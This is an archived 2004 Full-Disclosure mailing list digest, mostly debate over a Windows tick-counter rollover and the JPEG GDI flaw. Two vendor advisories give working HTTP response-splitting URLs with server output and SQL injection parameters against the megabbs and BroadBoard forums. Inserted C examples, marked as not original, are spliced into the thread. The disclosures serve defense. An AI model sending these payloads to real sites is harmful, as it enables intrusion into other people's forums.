Full Disclosure mailing list archives

RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs


From: "Todd Towles" <toddtowles () brookshires com>
Date: Tue, 28 Sep 2004 11:41:48 -0500

It is possible to view a JPEG in an unpatched IE and it will automatically
install programs.

This is my understanding.  

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of milw0rm
Inc.
Sent: Monday, September 27, 2004 1:12 PM
To: full-disclosure () lists netsys com
Subject: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20
msgs

JPEG GDI problem,

Isn't this problem only capable of running if the jpeg was opened via
the user's actions?

Is it possible that webpages could be affected with jpegs with
internet explorer viewing them?  I wouldn't think so since what I have
read from multiple people's articles that it isn't this kind of bug.

Info needed.

Regards,
str0ke


On Mon, 27 Sep 2004 12:00:05 -0400,
full-disclosure-request () lists netsys com
<full-disclosure-request () lists netsys com> wrote:

Today's Topics:

   1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Exibar)
   2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Ron DuFresne)
   3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
   4. SANS GDIscan (bashis)
   5. HTTP Response Splitting and SQL injection in megabbs forum (pigrelax)
   6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
   7. Re: HTTP Response Splitting and SQL injection in megabbs forum (PD9 Software)
   8. Re: Re: HTTP Response Splitting and SQL injection in megabbs forum (DanB UK)
   9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
  10. Re: Windoze almost managed to 200x repeat 9/11 (Barry Fitzgerald)
  11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
  12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
  13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
  14. Re: Msg reply (Elvi)
  15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez)
  16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm (Thierry Carrez)
  17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise (debian-security-announce () lists debian org)

--__--__--

Message: 1
From: "Exibar" <exibar () thelair com>
To: "ASB" <abaker () gmail com>, <full-disclosure () lists netsys com>
Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to
200x repeat 9/11
Date: Sun, 26 Sep 2004 12:15:26 -0400

Exactly.  Some idiot decided to program the entire system to shut down after
49 days.  What an idiot, why not just setup a maintenance program to perform
a scheduled re-boot of the system instead of having an automated process
shut down the system and then have to schedule a work around for this by
scheduling a manual boot every 30 days (which someone forgot).

  This whole thing wasn't Windows' fault, but an idiot
programmer/manager/whatever fault.

  Exibar

-----Original Message-----
From: ASB [mailto:abaker () gmail com]
Sent: Sunday, September 26, 2004 10:56 AM
To: full-disclosure () lists netsys com
Subject: [inbox] Re: [Full-disclosure] Windoze almost managed to
200x
repeat 9/11


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.


-ASB

On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald
<bkfsec () sdf lonestar org> wrote:
ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Where issues like this relate to the OS is in the fact that the
OS
itself shouldn't be brought down by a poorly designed app.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

And where in that article did you read that the OS was brought
down by
a poorly designed app?



I didn't... I was responding to a point that was made about applications
being responsible for system failures.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Was it MS Windows that actually held the code that brought
the system down?


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The article was pretty clear:

<snip>

How you managed to read "OS failure" into this is rather
astounding...




How you manage to get up in the morning is rather astounding.

Next time, please read the thread in context.

Also, if you think that that's a detailed assessment of the problem,
you're not too bright.

So try and think a little harder next time, and not be so abrasive.
You may be having a bad day (most likely due to your poor attitude) but
don't take your own misunderstanding out on others, mmkay?

            -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




--__--__--

Message: 2
Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
From: Ron DuFresne <dufresne () winternet com>
To: Exibar <exibar () thelair com>
cc: ASB <abaker () gmail com>, <full-disclosure () lists netsys com>
Subject: RE: [inbox] Re: [Full-disclosure] Windoze almost managed to
200x
 repeat 9/11

On Sun, 26 Sep 2004, Exibar wrote:

Exactly.  Some idiot decided to program the entire system to shut down after
49 days.  What an idiot, why not just setup a maintenance program to perform
a scheduled re-boot of the system instead of having an automated process
shut down the system and then have to schedule a work around for this by
scheduling a manual boot every 30 days (which someone forgot).


Which, likely in this case, would have to somehow be monitored, seems to
be a pretty critical application, one in which lives are dependent, and it
is entirely possible the system might not recover from a reboot.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

--__--__--

Message: 3
From: "RandallM" <randallm () fidmail com>
To: <full-disclosure () lists netsys com>
Date: Sun, 26 Sep 2004 12:02:20 -0500
Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope?

What exactly would one gain by creating a PoC on this exploit?
How exactly does this compare to meaningful disclosures that were
revealed because someone would not listen or ignored the warnings
of their security vulnerability.

I mean, this is nothing like a program goof that allows clear-text
passwords or exposes files or the like. This exploit (if it can be
called that) took a lot of thought to create it and exploit it.

Correct me if I'm wrong but it does not fall into the category
of "exploit" as defined by this list. This was truly a "created Exploit"
that would not be there otherwise. This took intelligent input.

This is nothing more than a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.

<|>-- __--__--
<|>
<|>Message: 13
<|>From: "i.t " <fulldis () it97 dyndns org>
<|>Organization: i.t consulting
<|>To: full-disclosure () lists netsys com
<|>Date: Sun, 26 Sep 2004 11:57:33 +0200
<|>Subject: [Full-disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
<|>
<|>
<|>> On Saturday 25 September 2004 16:59, raza wrote:
<|>> > I just compiled this and it works well..
<|>> >
<|> ...
<|>> yes and it works very well.
<|>> > I can see this ones gaana be fun...
<|>> We'll have a worm within days.

<|>
<|>for nearly all of my clients using win xp I've deinstalled
<|>win messenger.
<|>one urgently wanted it back for communicating in real-time;
<|>and, of course,
<|>it's much more fun seeing a live picture of the
<|>counterpart(s) in the chat
<|>window...
<|>
<|>even having installed sp2 and the newest patches plus AV I
<|>can imagine a virus
<|>spreading within those pictures throughout the whole msn and so
on...
<|>any other defense?
<|>or ist this too much paranoia?
<|>
<|>i.t
<|>
<|>
<|>-- __--__--

--__--__--

Message: 4
To: full-disclosure () lists netsys com
Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
From: bashis <mcw () wcd se>
Reply-To: mcw () wcd se
Subject: [Full-disclosure] SANS GDIscan

Hi

I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable DLLs after
installing all available patches from M$..

WinXP Pro SP1
C:\WINDOWS\system32\gdiplus.dll
   Version: 5.1.3097.0 <-- Vulnerable version

Win2k Server SP4
C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
   Version: 5.1.3097.0 <-- Vulnerable version

[1]
http://isc.sans.org/gdiscan.php

Have a nice day
/bashis

--__--__--

Message: 5
From: "pigrelax" <pigrelax () yandex ru>
To: <full-disclosure () lists netsys com>
Cc: <bugtraq () Securityfocus com>, <info () pd9soft com>
Date:   Sun, 26 Sep 2004 21:56:44 +0400
Subject: [Full-disclosure] HTTP Response Splitting and SQL injection
in megabbs forum

URL: http://www.pd9soft.com
Tested megabbs 2.1

1. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fi
d=%0

d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type
:%20

text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20
Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>

Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>

2. HTTP Response Splitting

http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-
Leng

th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d
%0aC

ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/htm
l%3e
%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33

<html>Scanned by Maxpatrol</html>

Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>

3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'

MaxPatrol is a professional network security scanner distinguished by
its
uncompromisingly high quality of scanning, optimized for effective use
by
companies of any size (serving from a few to tens of thousands of
nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of
the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com
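
The server-side check that closes the response-splitting issue reported above, as an added C example that is not part of the original post or of megabbs: the value reflected into the `Location:` header is percent-decoded and tested for CR/LF, and the hardened redirect accepts only a numeric id. The function names, the assumption that `fid` is a numeric forum id, and the sample inputs are constructed for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode src into dst. Returns the decoded length, or -1 if the
 * input is malformed, decodes to a NUL byte, or does not fit in cap bytes. */
int pct_decode(const char *src, char *dst, size_t cap)
{
    size_t n = 0;
    if (cap == 0) return -1;
    while (*src) {
        int ch = (unsigned char)*src++;
        if (ch == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (lo < 0) return -1;          /* truncated or non-hex escape */
            ch = hi * 16 + lo;
            src += 2;
        } else if (ch == '+') {
            ch = ' ';
        }
        if (ch == 0 || n + 1 >= cap) return -1;
        dst[n++] = (char)ch;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Detection: 1 if the decoded value contains CR or LF, or cannot be decoded
 * (undecodable input is treated as hostile), 0 otherwise. */
int param_splits_header(const char *raw)
{
    char buf[512];
    if (pct_decode(raw, buf, sizeof buf) < 0) return 1;
    return strpbrk(buf, "\r\n") != NULL;
}

/* The flawed pattern: the decoded value is copied into the header as-is,
 * so an encoded CRLF ends the Location line and starts a new one. */
int redirect_unsafe(const char *raw_fid, char *out, size_t cap)
{
    char fid[512];
    int n;
    if (pct_decode(raw_fid, fid, sizeof fid) < 0) return -1;
    n = snprintf(out, cap, "HTTP/1.1 302 Object moved\r\n"
                 "Location: /megabbs/forums/forum-view.asp?fid=%s\r\n\r\n", fid);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Hardened: fid must be 1 to 9 decimal digits (assumed numeric id);
 * anything else is rejected before a header is built. */
int redirect_safe(const char *raw_fid, char *out, size_t cap)
{
    size_t len = strlen(raw_fid), i;
    int n;
    if (len == 0 || len > 9) return -1;
    for (i = 0; i < len; i++)
        if (!isdigit((unsigned char)raw_fid[i])) return -1;
    n = snprintf(out, cap, "HTTP/1.1 302 Object moved\r\n"
                 "Location: /megabbs/forums/forum-view.asp?fid=%s\r\n\r\n", raw_fid);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Number of CRLF-terminated lines before the first blank line, i.e. the
 * status line plus the headers a client would parse. */
int count_header_lines(const char *resp)
{
    int lines = 0;
    const char *p = resp, *eol;
    while ((eol = strstr(p, "\r\n")) != NULL && eol != p) {
        lines++;
        p = eol + 2;
    }
    return lines;
}

int main(void)
{
    /* Constructed sample: a harmless extra header smuggled through fid. */
    const char *bad = "7%0d%0aX-Constructed-Header:%20demo";
    char out[1024];

    printf("flagged: %d\n", param_splits_header(bad));
    if (redirect_unsafe(bad, out, sizeof out) == 0)
        printf("unsafe build emits %d header lines\n", count_header_lines(out));
    printf("safe build result for bad fid: %d\n", redirect_safe(bad, out, sizeof out));
    if (redirect_safe("4924", out, sizeof out) == 0)
        printf("safe build emits %d header lines\n", count_header_lines(out));
    return 0;
}
```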

--__--__--

Message: 6
From: "pigrelax" <pigrelax () yandex ru>
To: <full-disclosure () lists netsys com>
Cc: <bugtraq () Securityfocus com>
Date:   Mon, 27 Sep 2004 00:09:32 +0400
Subject: [Full-disclosure] SQL injection in BroadBoard Instant ASP
Message Board

BroadBoard Instant ASP Message Board

URL: http://www.broadboard.com/

1. software does not properly validate user-supplied input in the
'keywords'
parameter  in search.asp:
http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL
code]&method=1&method=1&body=1&subject=1&board=1&results=1

2. software does not properly validate user-supplied input in the
'handle'
parameter  in profile.asp:
http://broadboard/forum/profile.asp?handle=['SQL code]

3. software does not properly validate user-supplied input in the
'txtUserHandle' parameter  in reg2.asp:

POST /forum/reg2.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 121

txtNameFirst=1&txtNameLast=1&txtUserEmail=sales () maxpatrol com&txtUserHan
dle=
['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1

4. software does not properly validate user-supplied input in the
'txtUserEmail' parameter  in forgot.asp:

POST /forum/forgot.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
txtUserEmail=['SQL code]&cmdSend=1

MaxPatrol is a professional network security scanner distinguished by
its
uncompromisingly high quality of scanning, optimized for effective use
by
companies of any size (serving from a few to tens of thousands of
nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of
the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com

--__--__--

Message: 7
Date: Sun, 26 Sep 2004 13:50:50 -0500
From: PD9 Software <info () pd9soft com>
CC: full-disclosure () lists netsys com, bugtraq () Securityfocus com
Subject: [Full-disclosure] Re: HTTP Response Splitting and SQL
injection in megabbs forum

pigrelax wrote:

URL: http://www.pd9soft.com
Tested megabbs 2.1

1. HTTP Response Splitting
2. HTTP Response Splitting
3. More and more SQL injection:


All three issues have been addressed, and updates have been posted at
http://www.pd9soft.com/. Thank you for bringing them to my attention.

However in the future, would it be too much to ask that I am contacted
first?  I am very eager to fix any security vulnerabilities, but
sipping
coffee on a lazy Sunday afternoon and seeing this broadcast to a
public
list is a little disconcerting.

Thanks,
Matt Summers
PD9 Software, Inc

--__--__--

Message: 8
Date: Sun, 26 Sep 2004 23:12:42 +0100
From: DanB UK <danbuk () gmail com>
Reply-To: DanB UK <danbuk () gmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Re: HTTP Response Splitting and SQL
injection in megabbs forum

It seems like the OP was actually just trying to advertise their (or
affiliates) product.
I would say that it's not the 'done' thing.
However in the future, would it be too much to ask that I am
contacted
first?  I am very eager to fix any security vulnerabilities, but
sipping
coffee on a lazy Sunday afternoon and seeing this broadcast to a
public
list is a little disconcerting.
I understand your concern.

Regards,
Daniel
--
DanB UK
London, UK

--__--__--

Message: 9
From: "joe" <mvp () joeware net>
To: "'devis'" <devis () easynix net>
Cc: <full-disclosure () lists netsys com>
Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat
9/11
Date: Sun, 26 Sep 2004 18:42:29 -0400

I get paid nothing to hang out on this list. In fact many of my friends feel
I am wasting considerable time here because the vast majority of the people
are Linux bigots simply holding each others', ummm, hands.

Once in a while though some seriously good information or conversation
occurs here which is why I like to hang out and most of my responses tend to
be offlist. Occasionally I like to dampen some of the occasional this or
that about how bad Windows sucks from people who don't know enough about how
it works to even have a very good opinion. They are intelligent people
mostly, they just have a hamster up their bum about billg or MS for some
reason.

It is funny to me how this thread came onto the list as a "Windows sucks"
thread when it should have been a serious, "some programmers don't
understand data types sucks" thread. It is poor programming habits like this
that cause a great deal of the flaws in apps and OSes that others take
advantage of. Programmers need to understand the proper way to handle the
datatypes they use in their applications, whether it be checking for data
size constraints or data range constraints.

As for missing out on cash or something from MS, I am not so sure MS would
have me as an employee at the moment as I spend considerable time banging on
them and their OS and choices. I don't do it out in the public lists like
this as I am trying to be a righteous d00d to all of you cool people. I bang
on them in the private groups that have MS people seriously looking to make
things better.

For this specific thread, my main point is that someone who can't figure out
that an unsigned integer value that is incrementing will roll at some point
is a dangerous programmer no matter what OS they are on. This has nothing to
do with Windows or any OS. It is how computers work period. There isn't a
single OS out there that you could constantly increment a 32 bit unsigned
counter and not roll to zero. This is way below anything the OS can control.
At best it halts the program as soon as the overflow kicks. That really
wouldn't help much except possibly with data corruption. I don't think an OS
should be protecting apps from data corruption due to the app losing count
though.

  joe

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of devis
Sent: Saturday, September 25, 2004 12:49 PM
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat
9/11

Joe dude, how much u are getting from M$ a month to hang around this list ?
Zero ? Noway....send em a letter now dude.
And please don't serve me,  'just being objective crap', you HAVE to be
interested to defend it that well., if not, well,  you may be missing on
something...

joe wrote:

Definitely some interesting theories Ron.



1> the code was better done under the original OS, unix



While possible, nothing actually points at this as being the case.
Anyway, I would be curious as to the functionality of the system when
it was first launched on UNIX versus the end-result. Put this on
Windows and run it 10 years and then port to UNIX or *nix and there
will almost certainly be screwups there as well. In fact, I would be
pretty confident. I have dealt with poor ports to and from Windows
and
*nix. I have even dealt with bad ports from Mainframes to UNIX where
the whole time the Mainframe people were saying the same types of
things about UNIX that you like to say about Windows. Being a good
coder for one OS doesn't make you one for all Oses when dealing with
system
level components and interfaces.




2> considering "how often" you seems to run into this same
issue with other coders in the windows realm, windows coders tend to
be especially lazy/clueless as compared to coders in other OS'



I would expect the issue is the same as always. Sheer volume. There
are
good and bad coders period. Microsoft has surely drawn more poor
coders
than any other OS with its pushing of the RAD/simple coding
environment
such as VB.
Additionally the Windows environment as a whole has more
inexperienced
users and admins and people likely to try and code. There are also
many
good ones as well, they are just well buried in the poor ones.




3> tools to code with in the windows realm are not as
3> developed/functional
as they are in other envs



I would say this opinion is uninformed.




4> M$ does not properly provide developers with clued information
with
which to do their jobs



This is another opinion which I would call rather uninformed.

Even if there was poor function documentation, if you have a
function,
any function returning a constantly increasing counter you know, as a
skilled programmer, that eventually it has to do something other than
increase. If the value is signed the sign bit will flip or if it is
unsigned it will roll to 0. How can a good programmer think any other
thing? The compiler could have inserted exception handling code but
at
best that is simply going to bounce the program out of a normal
running
state. That is a compiler thing though, not an OS thing. I do hope
you
aren't trying to tell me that UNIX can magically and infinitely
maintain a counter on a variable with a fixed bit size. I try to
consider
you to be a bit more intelligent than that.



To put it in another way, if you have a set of tires on a car that
are
rated for 75 MPH (say off road truck tires) and some person goes 90
and
the tires fly apart or the vehicle flips or both, is the issue the
driver, the vehicle manufacturer, the tire manufacturer, or the tree
that produced the rubber for the tire? This is the same sort of case.
You have it in your mind ahead of time who you want to be at fault
because you have a bug up your bum about it and work to prove that
stance.

Poor coding is a result of poor coders. I have seen amazingly bad
code
on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to
Windows to DOS to VMS. I have also seen some amazingly good stuff on
the same platforms. Someone who doesn't understand basic data types
and
how to handle their limits is going to do a shitty job on all of the
platforms.

Is the ratio of good admins to bad admins better in UNIX versus
Windows?
Absolutely. Is the ratio of good programmers to bad programmers
better
in UNIX versus Windows? Most certainly. Does this mean all Windows
admins are bad admins, obviously not. Does this mean all Windows
programmers are bad programmers, obviously not. I specifically say
UNIX
versus *nix because I think *nix is one or more steps closer to
Windows
in this discussion and getting closer as its popularity grows with
Windows users. Switching to *nix doesn't make the admins or coders
switching (or just using in tandem) any better simply because they
switched.







-----Original Message-----
From: Ron DuFresne [mailto:dufresne () winternet com]
Sent: Friday, September 24, 2004 11:25 PM
To: joe
Cc: mcw () wcd se; full-disclosure () lists netsys com
Subject: RE: [Full-disclosure] Windoze almost managed to 200x repeat
9/11

On Fri, 24 Sep 2004, joe wrote:



Again, there are valid uses of GetTickCount and there are safe ways
of
doing so. If there is concern, I do recommend testing functionality
associated with each of the DLLs. You might find a bug you can
report
for


kudos.


On the incident, I would guess the vendor never had a clue it would
do


that.


That function can't return more than 49.7 days without breaking
every
app that currently uses it. MS can not do that. That is why there is
another function to get the info with a different datatype. See my
other


posts.



What seems to read clearly from your replies to this thread is that
either;

1> the code was better done under the original OS, unix

2> considering "how often" you seems to run into this same issue with
other coders in the windows realm, windows coders tend to be
especially
lazy/clueless as compared to coders in other OS'

3> tools to code with in the windows realm are not as
3> developed/functional
as they are in other envs

4> M$ does not properly provide developers with clued information
with
which to do their jobs


From which you can combine any or all of the above for a correct
interpretation of the total of your replies.

Thanks,

Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
      ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
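
The rollover discussed in this message, as an added C example that is not part of the original thread: a 32-bit millisecond counter wraps to zero after about 49.7 days, and the way elapsed time is compared decides whether code survives the wrap. The tick values are constructed to simulate a GetTickCount-style counter so the code runs on any platform; all function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

/* Days of uptime a 32-bit millisecond counter can represent before it
 * rolls to zero: 2^32 ms / 86,400,000 ms per day, about 49.7 days. */
double tick_wrap_days(void)
{
    return 4294967296.0 / (1000.0 * 60.0 * 60.0 * 24.0);
}

/* BROKEN: computes an absolute deadline and compares against it.
 * If start + timeout_ms wraps, the deadline becomes a small number and the
 * timer looks expired at once; if `now` wraps first, it never expires. */
int expired_naive(uint32_t start, uint32_t now, uint32_t timeout_ms)
{
    uint32_t deadline = start + timeout_ms;   /* may wrap modulo 2^32 */
    return now >= deadline;
}

/* SAFE: unsigned subtraction is defined modulo 2^32, so (now - start) is
 * the true elapsed time across one wrap, provided fewer than 2^32 ms
 * passed between the two samples. */
int expired_wrapsafe(uint32_t start, uint32_t now, uint32_t timeout_ms)
{
    return (uint32_t)(now - start) >= timeout_ms;
}

/* Widening the counter: track wraps in software to get a 64-bit uptime.
 * Must be fed a sample at least once per wrap period to stay correct. */
typedef struct {
    uint32_t last;   /* previous 32-bit sample */
    uint64_t high;   /* accumulated wraps, always a multiple of 2^32 */
} tick64_state;

uint64_t tick64_update(tick64_state *s, uint32_t now)
{
    if (now < s->last)
        s->high += (uint64_t)1 << 32;   /* counter rolled over */
    s->last = now;
    return s->high | now;
}

int main(void)
{
    /* Constructed samples: the timer starts 1000 ms before the wrap. */
    uint32_t start = 4294966296u;
    tick64_state st = { 0, 0 };

    printf("32-bit ms counter wraps after %.1f days\n", tick_wrap_days());

    /* 10 ms later, 5000 ms timeout: the deadline wrapped to 4000. */
    printf("naive, 10 ms in:    %d (wrong)\n",
           expired_naive(start, start + 10u, 5000u));
    printf("wrapsafe, 10 ms in: %d\n",
           expired_wrapsafe(start, start + 10u, 5000u));

    /* 1100 ms later the counter reads 100; 500 ms timeout has passed. */
    printf("naive, after wrap:    %d (wrong)\n",
           expired_naive(start, 100u, 500u));
    printf("wrapsafe, after wrap: %d\n",
           expired_wrapsafe(start, 100u, 500u));

    tick64_update(&st, start);
    printf("64-bit uptime after wrap: %llu ms\n",
           (unsigned long long)tick64_update(&st, 100u));
    return 0;
}
```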

--__--__--

Message: 10
Date: Sun, 26 Sep 2004 20:41:34 -0400
From: Barry Fitzgerald <bkfsec () sdf lonestar org>
To: ASB <abaker () gmail com>
CC: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat
9/11

ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.





Oversimplification is for the foolish.  Like I said, you're not too
bright.

You're showing very little understanding of system architecture here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for issues
and for them not being OS issues.  My point was that it's not always
clear cut.

I was not trying to say that this case was an OS issue.  I was trying
to
say that the line is not always black and white.  I was also pointing
out that none of us know because the only information we have to go on
is third-hand and imprecise.  If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?  Go
solve the world's problems or something.  of course, you can't so
you've
decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what
I've
said (which, you won't, because I'm right) then I'm willing to hear
them.  Other than that, you're just wasting everyone's time by trying
to
railroad points that you don't understand.

       -Barry

--__--__--

Message: 11
From: "Vince Able" <we_hate_vince () hotmail com>
To: <full-disclosure () lists netsys com>
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat
9/11
Date: Sun, 26 Sep 2004 21:24:27 -0400
Organization: The Ram Group

Well what a nice first post to read entering Full-Disclosure. LoL
----- Original Message -----
From: "Barry Fitzgerald" <bkfsec () sdf lonestar org>
To: "ASB" <abaker () gmail com>
Cc: <full-disclosure () lists netsys com>
Sent: Sunday, September 26, 2004 8:41 PM
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat
9/11

ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.





Oversimplification is for the foolish.  Like I said, you're not too
bright.

You're showing very little understanding of system architecture
here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for
issues
and for them not being OS issues.  My point was that it's not always
clear cut.

I was not trying to say that this case was an OS issue.  I was
trying to
say that the line is not always black and white.  I was also
pointing
out that none of us know because the only information we have to go
on
is third-hand and imprecise.  If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?
Go
solve the world's problems or something.  of course, you can't so
you've
decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what
I've
said (which, you won't, because I'm right) then I'm willing to hear
them.  Other than that, you're just wasting everyone's time by
trying to
railroad points that you don't understand.

       -Barry






--__--__--

Message: 12
Date: Sun, 26 Sep 2004 22:36:12 -0400
From: ASB <abaker () gmail com>
Reply-To: ASB <abaker () gmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Windoze almost managed to 200x repeat
9/11

There was more than enough information provided in the initial link,
besides what was available to those who took a moment or 3 to search
for additional info, to avoid coming to the conclusion that the OS was
the fault here.

The mere fact that thousands, if not millions of people manage to run
Windows 2000 systems which do not keel over every 49.7 days, would
tend to cause one to look elsewhere for the source of the issue.
Beyond that, the wording of the various articles on this issue that I
looked at, made it rather obvious that there was an issue with the
APPLICATION which rendered it useless if certain operator steps were
not performed. No matter how scanty you feel the articles were, they
never even implied that the OS was inoperable during any of this.

While it is certainly important to have as much information as
possible before rendering verdicts of any sort, and while not every
issue can be definitively outlined as jet black or lily white, there's
not a whole lot more forensics that's needed to conclude that the root
of the issue is one of application development, compounded by the
failure of an operator to perform a prescribed workaround at the
appointed time.

The irony here is that you're accusing me of not reading or
comprehending.

-ASB

On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald
<bkfsec () sdf lonestar org> wrote:
ASB wrote:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.





Oversimplification is for the foolish.  Like I said, you're not too
bright.

You're showing very little understanding of system architecture
here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for
issues
and for them not being OS issues.  My point was that it's not always
clear cut.

I was not trying to say that this case was an OS issue.  I was
trying to
say that the line is not always black and white.  I was also
pointing
out that none of us know because the only information we have to go
on
